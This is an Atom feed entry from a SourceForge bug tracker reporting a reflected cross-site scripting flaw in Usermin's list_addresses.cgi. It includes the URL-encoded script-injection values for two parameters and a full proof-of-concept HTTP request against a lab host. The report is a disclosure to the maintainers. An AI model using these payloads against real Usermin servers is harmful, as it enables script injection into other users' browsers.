<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en" xmlns="http://www.w3.org/2005/Atom"><title>Recent changes to 478: XSS (cross-site scripting) vulnerability in /mailbox/list_addresses.cgi</title><link href="https://sourceforge.net/p/webadmin/usermin-bugs/478/" rel="alternate"/><link href="https://sourceforge.net/p/webadmin/usermin-bugs/478/feed.atom" rel="self"/><id>https://sourceforge.net/p/webadmin/usermin-bugs/478/</id><updated>2019-10-21T00:44:24.029000Z</updated><subtitle>Recent changes to 478: XSS (cross-site scripting) vulnerability in /mailbox/list_addresses.cgi</subtitle><entry><title>XSS (cross-site scripting) vulnerability in /mailbox/list_addresses.cgi</title><link href="https://sourceforge.net/p/webadmin/usermin-bugs/478/" rel="alternate"/><published>2019-10-21T00:44:24.029000Z</published><updated>2019-10-21T00:44:24.029000Z</updated><author><name>Peter</name><uri>https://sourceforge.net/u/inf0seq/</uri></author><id>https://sourceforge.net8d12c558ab4824c88bc3059b6ddaba52de01bc24</id><summary type="html">&lt;div class="markdown_content"&gt;&lt;p&gt;Affects Usermin versions up to 1.780.&lt;/p&gt;
&lt;p&gt;Testing done by setting all user input parameters to: &amp;gt;"'&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;/p&gt;
&lt;p&gt;The following parameters were found vulnerable: &lt;br/&gt;
Set parameter 'mode's value to '%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'&lt;br/&gt;
Set parameter 'gadd's value to '%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'&lt;/p&gt;
&lt;p&gt;This alllowed to successfully embed a script in the response, which than executed when the page loaded in the user's browser.&lt;/p&gt;
&lt;p&gt;Sample Proof-of-Concept:&lt;/p&gt;
&lt;p&gt;GET /mailbox/list_addresses.cgi?mode=%3E%22%27%3E%3Cscript%3Ealert%28847%29%3C%2Fscript%3E&amp;amp;gadd=%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1&lt;br/&gt;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko&lt;br/&gt;
Referer: &lt;a href="https://10.0.0.5:20000/mailbox/list_addresses.cgi" rel="nofollow"&gt;https://10.0.0.5:20000/mailbox/list_addresses.cgi&lt;/a&gt;&lt;br/&gt;
Cookie: usid=f610dae7a3720a29d43a7493da7147f8; testing=1; redirect=1&lt;br/&gt;
Connection: Keep-Alive&lt;br/&gt;
Host: 10.0.0.5:20000&lt;br/&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,&lt;em&gt;/&lt;/em&gt;;q=0.8&lt;br/&gt;
Accept-Language: en-US&lt;/p&gt;
&lt;p&gt;Usermin was inatslled on Ubuntu 18.04.&lt;/p&gt;&lt;/div&gt;</summary></entry></feed>